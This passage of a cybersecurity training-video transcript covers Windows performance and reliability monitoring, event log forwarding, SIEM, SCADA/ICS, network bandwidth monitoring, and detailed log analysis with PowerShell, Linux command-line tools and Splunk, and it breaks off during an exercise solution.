adds it over on the right [to the Added counters section.] and I'll click OK. [The dialog box closes and the
screen goes back to the Performance Monitor window.] And now it's been added down here, [The average
Disk Queue Length for the available physical disks are now listed in the table along with the percent
Processor Time.] we've got the average disk queue length, in total, but also we've got the individual disk
queue lengths. For the total one, I'm going to double-click on it, [The Performance Monitor Properties dialog
box opens. It includes various tabs such as General and Data. The Data tab is selected by default. It includes
drop-down list boxes for Color, Scale, Width, and Style. There are also three buttons at the bottom of the
dialog box, namely OK, Cancel, and Apply.] where I can change things like the color and the width of that
specific line as it gets written to the graph. [He changes the color and width of the graph line from their
respective drop-down lists.] And we can see it listed here now a little bit more clearly at the bottom. Naturally,
as we have more disk I/O activity, we can expect that thick green bar for the average disk queue length in total
to start spiking periodically. And just because you've got a spike in a graph doesn't mean that there's
necessarily a problem.
It means, perhaps, that the server is simply doing its job, it's dealing with file I/O for instance. So, again, you
need a baseline of normal activity for your particular environment before a lot of this becomes truly
meaningful and useful to make decisions from. Speaking of making decisions and establishing baselines, over
here on the left, if I go into Data Collector Sets, [He expands the Data Collector Sets folder from the
navigation pane. It displays various subfolders such as User Defined and System.] I could build a custom,
user-defined data collector set. So I could right-click here and choose New > Data Collector Set. [The Create
new Data Collector Set wizard opens. It includes a Name textbox and two radio buttons, Create from a
template (Recommended) and Create manually (Advanced). It also has three buttons at the bottom: Next,
Finish, and Cancel.] Maybe I'll call this Establish Baseline, because what I could do is gather performance
metrics over time on this particular host, although it could be counters from remote hosts over the network. So
I'm going to choose Create manually here, and I'll click Next. [The next page of the wizard contains two radio
buttons, Create data logs and Performance Counter Alert. The Create data logs radio button has three
checkboxes listed under it, namely Performance counter, Event trace data, and System configuration
information.] And what I want to do here is work with performance counters, so I'll turn on the check box for
performance counter, and I'll click Next. [The next page of the wizard includes a Performance counters field
and two buttons, Add and Remove. It also has a spin box for Sample interval and a drop-down list box for
Units.] Then I click Add to choose the specific performance counters from the local, or even remote
computers. [The add counters dialog box opens.] So we have options related for that, so I'm going to scroll
down to, again, the P, physical disk section. And just for consistency, maybe we'll choose the average disk
queue length here, and I'll add it for all instances, I'll click Add, and OK. And I'm going to have that sampled,
let's say every 15 minutes, and I'll click Next, I'll accept the defaults. And on the last screen, though, what I do
want to do is open up the properties for the data collector set. So I have to turn that option on, and then I'll
click Finish. [The wizard closes and the EST Baseline Properties dialog box opens. It includes various tabs
such as General, Security, and Schedule.] I want that option because here I can go to the Schedule tab, where I
can add a schedule, [He clicks the Add button at the bottom of the Schedule tab. A Folder Action dialog box
opens.] in terms of when I want this data collector set to begin gathering information, on which days of the
week and so on.
So maybe I'll have it start, let's see here, on the following Monday, September 19th. And I'll have it expire,
maybe, at the end of that week, September 23rd. So I have five business days worth of working data, and then
I'll click OK. [The dialog box closes.] So then I'll be able to see reports down here, [He expands the reports
folder in the navigation pane.] for example, for user defined items like Establish Baseline, over time, once it's
gathered that information and the schedule has kicked in. Now of course, aside from Performance Monitor,
which I'll close, we can also go into the good old Task Manager. So, one of the ways I can do that, of course, is
to search for it. So I'm going to search for Task Manager here in my Start menu, I'm going to launch that
tool. [The Task Manager window opens. Running along the top is a menu bar with three menus, File, Options,
and View. Below that are various tabs such as Process and Performance. The Process tab is selected by
Default. It lists various running processes in a tabular format. The table headers are Name, Status, CPU, and
Memory.]
Task Manager in Server 2012 R2 will give us a list of running processes. Of course we can sort them by
name, [He clicks the Name table header. The processes are now alphabetically grouped under two sections,
Apps and Background processes.] or they're grouped by default as well. We can turn that on, because if we go
under View menu, we can see that it's grouped by type. So the apps are grouped together, our background
processes are listed grouped together. Of course we could sort by CPU utilization or memory utilization if the
system is sluggish and we suspect it's due to a single running process, for instance. Under the Performance
tab, [He clicks the Performance tab. It includes four radio buttons: CPU, Memory, Ethernet, and
Ethernet.] we can see the CPU graphed information for all cores on this host. We could also click on Memory
here to view our memory utilization on a graph, to see how much memory is in use out of our total available
memory. We could click on Ethernet to view information about our Ethernet traffic. So, we've got various
Ethernet adaptors here, so that's why I've got multiple occurrences here of Ethernet on the left-hand side.
You'll see when I select the first one, I get the IP address information listed, which is going to be different
from my second instance of an Ethernet interface. [He closes the Task Manager window.] We could also go to
the Windows Start menu and search up reliability. The Reliability history tool is interesting because it gets its
data from the Windows Event Viewer logs. [He clicks the View reliability History option from the search. The
Reliability Monitor window opens. It displays a stability index graph for each day and details of the events
below it. These details are listed in a tabular format. The table headers are Source, Summary, Date, and
Action.] And what it will do is it will chart a stability index, which is this blue graphed line across the top.
Whenever there's a problem, and we can see we've got a couple of problems here, of course they're aligned
with our dates at the bottom and they are red circles with white X's. Whenever there's a problem, notice the
overall stability line index dips down, because the system isn't as stable any longer. So I can click right on one
of those problems down below and see what the issue was. So I've got an instance here of Windows not being
properly shut down on September 5th at a certain time. And I can see that, well, that caused the instability
index graph to go down. And then I've got other issues here which I could click on. Of course over time, as we
no longer have problems, notice that the line keeps going up. So this is another valid monitoring tool overall. It is based on the gathered log information on the Windows host, and it gives us a quick picture of how the system is doing overall, in terms of health. In this video, we took a look at Windows OS monitoring tools.
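For anyone who wants to capture a counter like the one used above without the GUI, Windows also ships a command-line collector called typeperf; a rough sketch mirroring the demo's choices (the counter path, a 15-minute interval, and a CSV output file are shown purely as an example):

    :: Sample Avg. Disk Queue Length every 15 minutes (900 seconds), 20 samples, saved to CSV
    typeperf "\PhysicalDisk(_Total)\Avg. Disk Queue Length" -si 900 -sc 20 -o baseline.csv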
[Topic: Windows Event Log Forwarding. The presenter is Dan Lachance.] In this video I'll demonstrate how
to configure Windows Event Log Forwarding. Here in Windows 7, I'm going to configure it such that a Windows server can reach out periodically, grab specific log events from this host, and store them on itself. That way we can have centralized logging. The first thing I'll do here in Windows 7 is I'm just going to
go ahead and go to the command prompt, and I'm going to type winrm qc for quick config. The WinRM
underlying service which uses an HTTP transport is actually what's used to deliver these log messages over the
network. So here it's telling me it's going to create a WinRM listener. And it's going to make sure that the
service is running and that there's a firewall exception. So I'll press Y to accept that those changes will be
made. And it's been done. Now of course, you could use group policy in an Active Directory environment to
enable WinRM on multiple machines. But this is how you do it on a single machine. [Dan closes the command
prompt window.] The other thing we have to bear in mind, and again, you might configure this centrally through other tools like group policy, is that the server that's going to reach out over the network into this machine, or any machine, to grab log information needs to have certain privileges. So I'm going to go ahead on
this machine and right click on Computer in the Start menu. It's running Windows 7 and I'm going to choose
Manage. [The Computer Management window opens.]
Where on the left, [in the navigation pane,] I'm going to go under Local Users and Groups and click Groups.
There's an Event Log Readers group, so I'm going to double click on that to open it up. [The Event Log Readers Properties dialog box opens.] And I want to click Add because I want to add my server as a member. [The
Select Users, Computers, Service Accounts, or Groups dialog box opens.] So what I'm going to do then is
click the object types, and I'll deselect Service Accounts, Groups, and Users. Because I know I only want to
look at computers, so I'll turn a check mark on for that. I'll click OK. The location is my domain name here,
quick24x7.com, that's an Active Directory domain. So I'll click the Advanced button, then I'll click Find Now to
list computers in the domain. The server that will be configured as a centralized logging collector host is my
domain controller DC001. So I'm going to select that from the list. I'll click OK and OK. So that takes care of
what needs to be done here if you will on the client side. Let's switch over to the server and see what needs to
be done there. On my Windows server I'm going to go ahead and go to the Start menu. And what I want to do
here is start by opening up the event log viewer tool. So I'm going to go ahead and choose Event Viewer. Once
that pops up, the idea here is that I want to make sure I have a configuration which is called a
Subscription. [The Event Viewer window opens.] That will require this server to periodically go out and get
information from specified hosts, specific log information and bring it back here. So I'm going to go ahead and
expand or maximize the Event Viewer window. And if I were to expand for example Windows Logs [from the
navigation pane,] we see that there's a default Forwarded Events view, [He clicks the Forwarded Events
option from the navigation pane. There are no forwarded events listed currently.] which is designed to hold
items forwarded from other machines.
We could change that but that's what I'm going to stick with. So I'm going to go ahead and click Subscriptions
over here on the left. [An Event Viewer message box opens.] It tells me on my server that if I want to work
with these subscriptions for log forwarding the Windows Event Collector service must be running. So I'm
going to click Yes, to make that happen. Then I'll right-click on Subscriptions in the left hand panel, and I'll
choose Create Subscription. [The Subscription Properties dialog box opens. It includes fields for Subscription
name and Description. Below that is the Destination log drop-down list box. Below that is the Subscription
type and source computers section that has two radio buttons, Collect initiated and Source computer initiated.
The Collect initiated radio button is selected by default. It has a Select Computers button beside it. Below the
section is a Select Events button to select Events to collect and an Advanced button to configure advanced
settings. There is an Ok and Cancel button at the bottom of the dialog box.] Here I'm going to call it Collect
Problems. Because essentially I'm going to be collecting only critical errors, that type of thing from machines.
The destination log here is set to forwarded events which we can see over here on the left. Collector initiated is
what I want. The server is the collector. It will initiate a connection out to machines that I specify, which I do
here by clicking the Select Computers button. [The Computers dialog box opens. It includes a Computers field
and buttons such as Add Domain Computers, Remove, and Test.] So I'm going to click Add Domain
Computers. [The Select Computer dialog box opens. It includes fields such as Select this object type and From
this location. It also includes various buttons such as Advanced and OK.] And I'm going to go ahead and click
Advanced > Find Now. [The dialog box expands to show various search results.] And I'm going to choose our
Windows 7 domain joined computer. And I'll click OK. [The Select Computer dialog box closes and the
screen goes back to the Computers dialog box.] Now, notice that you can select a computer added here. And
click the test button on the right to make sure it can be reached properly over WinRM. [An Event Viewer
message box opens which has the following message: Connectivity test succeeded.] So the connectivity then is
in place. So I'm going to go ahead and click OK. [The screen goes back to the Subscription Properties dialog
box.] But we haven't yet told it what type of log entries that we're interested in. So down below, I'm going to
click the Select Events button. [The Query Filter dialog box opens.] And here I'm going to tell it I only want
Critical, Warning, and Error items from, and here I can choose of course, the specific Windows Logs. Maybe
I'll choose the System log for those hosts or that host. In this case it's only one. You can also select multiple
logs from this list. So here we're looking for Critical, Warning, and Error entries from the Application, Security, and System logs. Now after a few minutes, [He closes both the dialog boxes to go back to the Event Viewer
window.] if you go ahead and look at Forwarded Events, then you're going to start to see some of these items
where really if you select one of these items in Forwarded Events, you're going to see where it came from.
You'll see the computer listed here and you'll also see the log. Here we've got, for example, the System log.
And as we scroll down we'll see other items that might have come from different logs such as the Application
log and so on. So maybe way down here we can start seeing that yes, indeed we are getting these events
forwarded from our Windows 7 station to this server from different logs. In this video, we learned how to
configure Windows Event Log Forwarding.
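For reference, the two command-line pieces of this setup can be summarized as follows (a sketch; the subscription itself was created in Event Viewer above, but wecutil can list and inspect it once it exists, and the subscription name matches the one used in the demo):

    :: On the source computer (the Windows 7 host): enable WinRM with a quick configuration
    winrm quickconfig

    :: On the collector server: enable and configure the Windows Event Collector service
    wecutil qc

    :: List existing subscriptions, then show the settings of the one created above
    wecutil es
    wecutil gs "Collect Problems"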
[Topic: SIEM. The presenter is Dan Lachance.] In this video, I'll talk about SIEM. SIEM stands for Security
Information and Event Management. It's an enterprise class monitoring and remediation tool. So it allows us to
view security-related events in real time, and it also allows us to view that data from a single point of view.
Pictured in the diagram, we can see that our SIEM solution can gather data from many sources including
servers, switches, routers. Even PLCs in more industrial environments. The SIEM solution, through its
monitoring and storage of data, can help identify trends and patterns over time.
But it can also be used to detect events that are out of the ordinary. A SIEM solution is usually one or more
virtual appliances that technicians connect to using a web browser interface. And the technician might then
work with a dashboard that has charts and graphs and certain warnings. And, for instance, a pie chart might
even have multiple slices that each indicate the number of occurrences of certain types of incidents on a single
network device. So there are many great benefits to using SIEM, especially in a larger environment. SIEM
solutions often are a combination of security information management as well as security event management.
So we can detect events that look suspicious, but we can also take gathered security information,
such as standard log file information, and identify patterns over time. And as our networks keep growing and
growing because we keep adding things like smart phones and laptops and so on, often we'll need a centralized
tool that can do just that: monitor security information and also be able to manage events as they occur.
The SIEM solution will collect data into a central repository. SIEM solutions always use some kind of a back-
end database to store this data. Naturally, the amount of data that needs to be processed, stored, and analyzed will determine how many virtual appliances you need that do SIEM analytics. So we
might collect, for example, log files from different devices. Whether they're intrusion prevention system
devices, server operating systems.
Or it could even include vulnerability scanners and so on. Now because those file formats for log files might
differ from platform to platform, a SIEM solution has to be able to accommodate various file formats. Also,
with SIEM solutions, they're designed to have the ability to quickly look at large data sets to search for
something that is relevant. So, for example, if we're looking at PCI DSS compliance for companies that work
with cardholder data, we might need to quickly identify user accounts that have been inactive for a period of
time. Because they need to be disabled in order to adhere to PCI DSS compliance. SIEM can use multiple
collection agents that can run on network devices and report back to the centralized SIEM virtual appliance.
There's a hierarchy in the sense that all of the gathered data on the client is sent back up to a centralized host
where reporting takes place. Now you might even have a hierarchy that has multiple levels of SIEM hosts,
where in the end, all of the reporting data is sent back up the hierarchy to a single SIEM instance. So we can
gather information from many locations, like end user devices. Now, naturally, that would include log files for
things like operating systems on smartphones and laptops, but also even events that occurred, like when a user
plugged in a USB thumb drive on a laptop. That would be gathered by a SIEM agent and sent back to the
SIEM appliance. And it will be dealt with from there. Information can also be gathered from servers, various
types of network devices, like routers and switches, firewalls, and intrusion detection systems. So, the idea is,
we might even have our SIEM system with an agent on a database server that is configured to detect an abuse
of privileges within that database application. SIEM systems are either rule-based, where we configure rules to
tweak them for our specific environment, or they could be statistical correlation engine-based, where there's
correlation that takes place. For instance, if it sees that there are way too many packets coming from a single IP
address within a short period of time, it might report that as abnormal activity. The best SIEM solutions
actually contain both of these options. Considerations for SIEM solutions include the fact that the installation can be complex, especially on a larger scale where we need to deploy collection agents on many
different types of devices. It can also be complex to administer when it comes to building a rule set that is
specific to your environment. And in some cases, they can be expensive. However, it might be well worth the
cost if we need to run a SIEM system to pass some kind of compliance audit, such as PCI DSS. In this video,
we talked about SIEM.
7. Video: SCADA and ICS (it_cscybs_13_enus_07)
In this video, you will identify where SCADA and ICS are used in different industries.
Objectives
[Topic: SCADA and ICS. The presenter is Dan Lachance.] In this video I'll talk about SCADA and I'll talk
about ICS. SCADA stands for supervisory control and data acquisition. It's a remote hardware monitoring
solution that most of us won't be using on our local area networks. It tends to be used, more often than not, in
scientific environments, in various industrial environments, medical, manufacturing. Or even to control and
monitor heating, ventilation and air-conditioning or HVAC systems. SCADA components include sensors of different types, such as sensors on physical equipment parts that watch for water pressure changes or check the state of valves or motors. Gathered sensor data is then sent to hardware controller units. Now from there, the data is
then forwarded to the SCADA software where it's stored in a database for analysis and reporting.
And this is where SIEM kicks in, security information and event management. ICS stands for industrial
control system. SCADA is actually a type of ICS. ICSs are used often in places such as oil refineries,
manufacturing plants, water treatment plants, power generation facilities, recycling facilities, and waste
management facilities, just to name a few. In 2010, the Stuxnet worm targeted industrial control systems, or
ICSs. Specifically, it affected centrifuges for uranium enrichment at plants in Iran. So this is a great example of
malware that can actually have a major impact in the physical world. In this video we discussed SCADA and
ICS.
[Topic: Monitoring Network Bandwidth. The presenter is Dan Lachance.] In this video, I'll discuss Network
Bandwidth Monitoring. By capturing network traffic over time and analyzing it, we can understand what the
normal network data flows are on a specific network. And this can be really useful if you want to set up a
baseline of normal activity that might be used for comparison of current activity with things like intrusion
detection and prevention systems out on the network. The placement of the tool, whether it be hardware or
software, that we're using to monitor the network is always crucial. So for example if we want to monitor
network utilization on a specific VLAN, then our device whether it's hardware or software, should be placed
on that VLAN. Traffic shaping allows us to determine how the network is utilized to meet our network needs. For example, we might throttle bandwidth so that activity to and from certain servers is preferred; in other words, more bandwidth is available for those servers than for other servers that don't have as much network activity.
Bandwidth monitoring is also crucial for network capacity planning, where we can determine not only what's currently happening on the network but any potential future needs for more bandwidth. We can also at the same time prevent unnecessary spending, because what we might do is determine that the network is not being used efficiently. So instead of spending more for more bandwidth we
might better utilize what we already have. Examples of things that we might learn by monitoring networks
include detecting things like denial of service attacks or distributed denial of service attacks, DDoSes. We can
also determine if we should be prioritizing traffic using quality of service or QoS. For instance, voice over IP
traffic might have a higher priority being sent over the network because it's time critical, versus HTTP or
SMTP traffic. Our tool of choice might also easily identify chatty hosts on the network.
And this might even lead us to the fact that perhaps we've got an infected host that is sending and transmitting
more traffic than is normal on the network. Common network bandwidth monitoring tools include tools such
as Netflow Analyzer, Multi Router Traffic Grapher, MRTG, and BitMeter OS. Let's take a moment and view
what the Netflow Analyzer looks like. A picture paints a thousand words, [The screen switches to
oriondemo.solarwinds.com website. It displays analyzed data such as Top 10 Endpoints and Top 10
Applications in the form of pie charts.] so many of these network monitoring tools will allow us to view things
in graph format. For example, here I've got a pie chart that displays the Top 10 Endpoints. Of course I can
hover over any one of the items within the pie, in other words the slices of the pie chart, to get details about the
host or the ingress or inbound bytes or egress or outbound bytes from that host. As well as the ingress and
egress packets as we can see here. Now as I scroll down below things like those charts, for example for the
Top 10 Endpoints, I can see the host names. So it's telling me the Top 10 Endpoints in terms of host names. I
can also see over on the right I've got a pie chart for the Top 10 Applications. And overwhelmingly, if we
scroll down a bit, we can see it's HTTP.
World Wide Web traffic, that's the big blue part of this pie slice here. Now that would be much more difficult
to determine by using a standard packet capturing tool like Wireshark. So when we have other tools on the
network that are designed for that purpose, we can very quickly determine how the network is being used. As
we scroll through our interface, we can also see the NetFlow Sources here. So I can see the specific routers and
interfaces that are available, that we're gathering information from. And as we go down, for instance, if I were to hover over a specific routing device, then I can get information about it by clicking the link, or I can hover over it to get a couple of quick details, like the CPU load on that router. But I can even drill down to the
interface on a router. So for example, if I select or simply hover over the link for an interface on a router, I can
see some statistical information, including the current traffic, how utilized it is in terms of transmitting and
receiving, and so on. I can also scroll down and take a look at the top five conversations between hosts on the
network. So again this big blue part of this pie chart lists the two host names that are involved in the most
utilization on the network. So clearly using this type of tool really sheds a lot of light on how the network is
being used and how we might even better utilize it. Or in some cases we might even determine that there's
something suspicious happening on the network. In this video we took a look at how to monitor network
bandwidth.
9. Video: Point-in-time Data Analysis (it_cscybs_13_enus_09)
In this video, you will learn how to analyze timestamped data from various sources.
Objectives
[Topic: Point-in-time Data Analysis. The presenter is Dan Lachance.] When analyzing data, it's always
important that we have a trusted time source. In this video, we'll talk about Point-in-time Data Analysis. IT
system administrators will often need to legitimately analyze data resulting from activity on the network as a
whole, individual hosts, applications running on hosts, and that data often comes from logs. However, on the
malicious user side, the same type of activity might be used for reconnaissance. So, it could be the
unauthorized analysis of networks, hosts, applications, and related logs. And this is one of the reasons why we want to ensure that systems that are publicly visible in some way are assumed to be compromisable. So, therefore, we might configure log forwarding to have a copy of the logging events stored elsewhere, because if those systems are compromised, so are their local log files. A security information and event management system or SIEM has
numerous correlation engine add-ins or plugins to give it additional capabilities. Some of these plugins allow
the related data to be used to identify and score threats so we can start prioritizing which threats are more
prevalent than others based on gathered information from devices on the network. However, a SIEM system requires specific rule configuration for a specific environment.
For instance, a rule needs to identify what the most valuable assets are in order for scoring of threats to work properly, and that requires configuration, because what counts as a valuable asset in one organization might differ in another organization. Another way that we can use data for Point-in-time Data Analysis is by using
backups. Backups are taken at a certain point in time and reflect the state of data or even operating system files
at that point in time. And in some cases when there is evidence gathering for forensic analysis purposes, this
can be very important. It's always necessary to make sure that there was a trusted time source in place when something occurred, such as a backup or even a snapshot of the file system or a
virtual machine. But then also, when gathering evidence for digital forensic analysis, it's always important to
make sure that we work only on copies of data, and never on the original data.
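As a quick illustration, preserving the integrity of that original data can start with a hash. A minimal PowerShell sketch, where the evidence path is just a hypothetical example:

# Record a SHA-256 hash of the original evidence file so any later alteration can be detected.
Get-FileHash -Algorithm SHA256 -Path "D:\Evidence\disk-image.dd" |
    Export-Csv -Path "D:\Evidence\disk-image-hash.csv" -NoTypeInformation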
The original data needs to be hashed, so we have a way to detect if anything has been altered since that data
was acquired. Point-in-time data analytics can also perform detailed log analysis from Windows or UNIX and
Linux environments from their respective log sources. Log forwarding should always be going to a centralized
logging host. So from here we have one place that we either manually view or have configured some kind of a
trigger to notify us when some kind of log event occurs. Now instead of configuring that, for example, for 500
devices on a network, we could have 499 of those devices forward log entries to one logging host. Now, of
course, we would have a duplicate logging host for fault tolerance but the idea is that we've got a single point
of reference for a multitude of log entries from different devices. So for Windows, we can enable Windows
Event Log subscriptions to make that happen. In the UNIX and Linux world it requires configuration of the
syslogd daemon. We can also use the results from different types of reports or activities to perform point-in-time data analysis.
Consider the fact that when a penetration test is run, the results are given to the owners of the network or the
host or the application. Also, if full network and security audits are conducted, then the audit findings can be
used as results that we might analyze to determine what vulnerabilities exist and what we can do about them.
Also vulnerability assessments, of course, are different than penetration tests because all vulnerability
assessments do is identify the vulnerabilities, whereas a penetration test will actively try to exploit them. But in the end, either way, we'll know what vulnerabilities exist, and in the case of a penetration test, we'll also have a proof-of-concept mechanism showing how exploitable those vulnerabilities really are. Data loss prevention or DLP systems can also serve as a rich source of data for
point-in-time data analysis. Now, DLP systems are used to ensure that sensitive data doesn't get into the wrong
hands. So, for instance, it might prevent the sending of a sensitive file through a file attachment in email to
people outside of the company. In this video, we talked about point-in-time data analysis.
[Topic: Data Correlation and Analytics. The presenter is Dan Lachance.] In this video, we'll have a
discussion about data correlation and analytics. One aspect of securing the enterprise is to monitor IT systems
and their resultant data. And there are plenty of tools that can do that in various ways. It's also important not
just to gather that type of data, but to analyze monitoring data to try to extract meaning from what we've got.
Now analysis could be historical, where we want to identify trends over time. So we might want to aggregate
data from different sources taken over time and we might even want to correlate it with current data. So real-
time data can also be used, and that's really useful when we need to identify suspicious activity that could
indicate that there's some kind of an exploit being taken advantage of. Of course, when we secure the
enterprise and look at all this monitoring data, we need an efficient way to run reports on only the extracted
relevant data.
There are also data retention laws and regulations that could apply to an organization that determine how long
data gets stored. In order for data correlation and analytics to provide relevant information, our network device
inventory needs to be up-to-date. Now we can't manually run around and write down what we have on a large
scale. Instead, we should use a centralized automated solution such as Microsoft's System Center
Configuration Manager, otherwise known as SCCM. There are other tools from other vendors, including
Altiris and Spiceworks. Either way, we need a way to track what is on the network. In this day and age, there's
lots of talk about big data. Well, one aspect of that, that can become complex, is the analysis of big data. So we
need to have a solution that is scalable if we're going to be monitoring information on a large network or on
multiple networks with thousands of devices. Now one of the things we could use is a cloud-based service
where we could spin it up as we need to do the analysis, and then spin it down when we no longer need it. That
way we're not paying for it when it's not in use.
So an example of this would be Amazon Web Services Elastic MapReduce tool. So essentially, we've got a
cluster of devices processing very large data sets so that we can extract only useful information. Now big data
analytics can also involve real-time analysis of network traffic, which gets a little more complex if we want to
analyze it as it's happening. Deep packet inspection is possible, where we look further into the packet than just its headers. Instead, we're looking down into the payload or the data portion of the packet to determine what's
happening or if there's something suspicious happening. Large volumes of device-monitoring data sets will be
able to benefit from the fact that we might have a cluster of machines working together to analyze the data,
such as is the case with Elastic MapReduce. We also have to consider the fact that big data analysis might
require correlation of differing data sources. So depending on the solution that we use for big data analytics,
we might be able to accommodate different types of data sources, or one system might have to export it in a
certain format so it's in a consumable form by another big data analytics solution. When we talk about big data,
we have to consider how much storage space will be required, especially if we've got retention requirements
where we've got to keep data hanging around for a long period of time. So we always have to think about the
current amount of required space, but also we need to think about future growth and capacity planning to make
sure we don't run out of space. And that's one case where the cloud comes in useful, where we can rapidly
provision additional disk space as it's needed. We should also consider the use of data deduplication.
In this way, we're only storing one copy of unique disk blocks, and in the end we're conserving disk space.
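On Windows Server, for example, post-process deduplication can be enabled per volume. A minimal sketch, assuming the Data Deduplication role service is available and that E: is a hypothetical volume holding the monitoring data:

# Install the deduplication feature, then enable it on the data volume.
Install-WindowsFeature -Name FS-Data-Deduplication
Enable-DedupVolume -Volume "E:" -UsageType Default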
Data correlation and analytics becomes extremely useful when we generate useful reports. As they say, a
picture paints a thousand words. So if we have reports that can be generated in some kind of graph format, then
people that are decision makers can quickly ascertain by looking at the graph what's happening and then make
a decision based upon it. However, for that to work properly, the reporting data must be trustworthy. Also, the
data must be current if we're looking at making new decisions based on that data. We can also integrate our
data correlation and analytics solution with intrusion detection and prevention policies to identify anomalies.
So essentially, we are reusing existing configurations since there is some overlap in what the possibilities are
in terms of detecting anomalies. Another aspect is to make sure that we configure our solutions such that they will
filter out false positives. A false positive is some kind of event that gets triggered where it may look, for
example, on the security side, as some kind of suspicious activity when, in fact, it's benign and normal activity.
And this is one of the reasons why many of these security solutions need to be tweaked. They need to have
very specially crafted rules that are specific to an environment. Data correlation and analytics also has the
benefit of being able to determine some kind of a response to discovered security incidents. In this video, we
discussed data correlation and analytics.
[Topic: Detailed Log Analysis. The presenter is Dan Lachance.] In this video, we'll discuss how to do a
Detailed Log Analysis. A Detailed Log Analysis lets you distinguish the noise from the various log sources
from the actual relevant data that you're looking for. An event is an occurrence on the network or on a host. So,
in our context, we're really talking about an event being written into a log file. But an event might also be
related to an email message, or a help desk system, and so on. Incident responders can look at log information
and make a decision as to whether or not a certain issue needs to be escalated. It might need to be escalated
because it's outside of the scope of authority of the current technician. Or, it could be beyond their skill set.
When we configure detailed log analysis settings, there are things that are common, regardless of the tool we're
using. Such as the configuration in the Windows environment of event log settings, like how big the log can
grow, where it's stored, and whether it's archived. The same thing is true in the Linux world, whether we use
log rotation. Also, we have the option of determining whether or not we want to configure log forwarding to
other hosts so that we have a centralized way to view all logs on a large scale. Incident response actions can
also be based on data found within log files. So, because this could also be used to make important decisions,
we want to make sure that our log data is trustworthy by securing it. Whether that means encrypting it or
forwarding it to other centrally and hardened logging hosts. Here in the Windows Event Viewer, I've already
opened up the Windows System log on my server. If I right-click on that log, System, in the left-hand
navigator, then I can choose Properties. [The Log Properties dialog box opens.] And from here, I can see
things like the current size of the log and when it was created and modified or accessed.
But down below, we'll find the configurable items, such as what we want to set the maximum log file size to
be, and the unit of measurement is kilobytes. And whether we want to archive logs or simply overwrite events
as needed and so on. Now at the same time, we can also do this kind of work in PowerShell. [Dan opens the
Administrator Windows Power Shell terminal. It lists the output of the following cmdlet: get-eventlog security
-newest 5.] And sometimes if you want to automate something, it might be easier. Here we've already issued
the get-eventlog cmdlet. We've told it we want to look at the Windows security log on this host. And we've
asked for the newest five entries. So by doing this, we now have a way to capture this information and
manipulate it. And therefore, automate any massaging of the data that might be required before yielding useful
results. In the Linux environment, [The screen switches to root@kali:~ command prompt window.] if we
change directory to /var/log and type ls, we'll see a number of log files. And the blue entries are actually
subdirectories that contain other log files. So, for instance, here I see a file called auth.log for authentication.
So if I use the cat command to display the contents of auth.log and pipe that to more to stop after the first
screenful. [He executes the following command: cat auth.log | more.] We can see we have a series of log
entries here related to sessions being opened and closed for various users, and so on. Now of course, in
Windows, we can right-click on a log and search through it or find something specific. Here in Linux, what we
might do is use the cat command against the log, and pipe it to the grep line filtering tool.
So, for example, if I want to look for something related to the word password, [He executes the following
command: cat auth.log | grep password.] I could filter it using grep. And now I'm only seeing items from
auth.log related to the search text, password. Another way to comb through log files, either manually or in an
automated fashion, might be to use some kind of a log analysis tool. [The screen switches to the splunk light
tool window. It includes a navigation bar at the top that has four tabs, Search, Reports, Alerts, and
Dashboards. The Search tab is selected by default. The page includes a What to Search section, which has
three tabs: Hosts, Sources, and Sourcetype.] Such as in this case, the Splunk Light tool, where I've already
gone and added a couple of log sources here. [He clicks the Sources tab to list the added sources.] I've got a
SCCM discovery log file, as well as a couple of Linux log files. Now, if I were to click on any of these, for
example, I'll click on the Linux daemon.log file here, then I can see it's opened up the log file. [The page has
four tabs: Events, Patterns, Statistics, and Visualization. The Events tab is selected by default and it displays
various log events by time.] And it's giving me the entries in an easy to read format. Much easier than it
appears at the command line on a Linux host, at least. And interestingly, a lot of these log analysis tools will
let you discern patterns. [He clicks the Patterns tab.] So here, it's telling me there's a 4.11% occurrence of this
specific log event, where it's activating a specific service. Also, we'll have the option in log analysis tools to
run reports of various kinds. And we'll even be able to configure alert notifications so that we get alerted when
certain things happen. We can also build our own custom dashboards that will show us information that is
relevant, based on what it is that we want to see. So there are various ways then to comb through log files.
Depending on your requirements, continuous log monitoring might be required so that you can respond in a
timely fashion to any anomalies that are detected.
Now when abnormalities are detected, this is only possible because we already have a baseline of normal
activity or log events. Many vendor solutions do have generic databases of abnormalities or known suspicious
behavior. But to really have this work properly in your environment, it needs to be tweaked for your
environment. You need a baseline of normal activity. That could be at the network level, the host level, but
often, it's at an application specific level. We can also use log filtering to filter out the noise from log files. We
could also use the search capabilities. And this can be automated, as we saw, for instance, using PowerShell.
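For example, a small PowerShell sketch that filters the Windows Security log down to failed logon events (event ID 4625) and exports them for review; the output path is hypothetical:

# Pull the 50 most recent failed logons and save them for an analyst or a follow-on script.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625 } -MaxEvents 50 |
    Select-Object TimeCreated, Id, Message |
    Export-Csv -Path "C:\Logs\failed-logons.csv" -NoTypeInformation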
We should also always audit log access so we know who has had access to logs at different times and what
they did. Example log items that would certainly warrant our attention include things like invalid user
messages, failed password, unknown host, invalid key, and so on. Of course, any missing date or time spans
within a log are suspicious because it indicates that perhaps the machine or the device was compromised. And
the attacker cleaned their tracks by wiping some log entries. In this video, we talked about doing a Detailed
Log Analysis.
Upon completion of this video, you will be able to describe the difference between vulnerabilities and exploits
as well as use various reporting tools.
Objectives
describe the difference between vulnerabilities and exploits as well as use various reporting tools
Exercise Overview
[Topic: Exercise: Understand Exploits and Monitoring. The presenter is Dan Lachance.] In this exercise, you
will discuss personnel management best practices, followed by distinguishing the difference between a threat, a vulnerability, and an exploit. Then you'll configure Windows log forwarding to a centralized host. You will
filter Windows log events to view only critical events. And finally you'll use Linux to create a forged TCP
packet. At this point, pause the video and perform each of these steps to the best of your abilities then come
back here to see the solutions.
Solution
Personnel management includes many best practices, such as thorough background checks to ensure that
individuals that will be hired are trustworthy and don't have a criminal background. We should also use
separation of duties. So, no single employee can control an entire business process from beginning to end. This
way, we can reduce fraud because more people are involved within the process. Mandatory vacations ensure
that when someone fills in an employee's position while they're on vacation, they'll be able to notice any anomalies or discrepancies beyond the norm. Cross-training can be important so that we've got more than
one person that has a specific capability or skill set in the company. A threat is a perceived negative impact
against an asset while a vulnerability is some kind of a weakness. And it may or may not be known to the
system owner or vendor, in which case, if it's not known to them, it's called a zero day. The exploit actually
takes advantage of a vulnerability. To configure Windows log forwarding on all the quote unquote client
devices whose log information will be sent, if you will, to a centralized logging host. We need to make sure
that that logging host's computer account has the ability to read logs. So here, for example, on a client system,
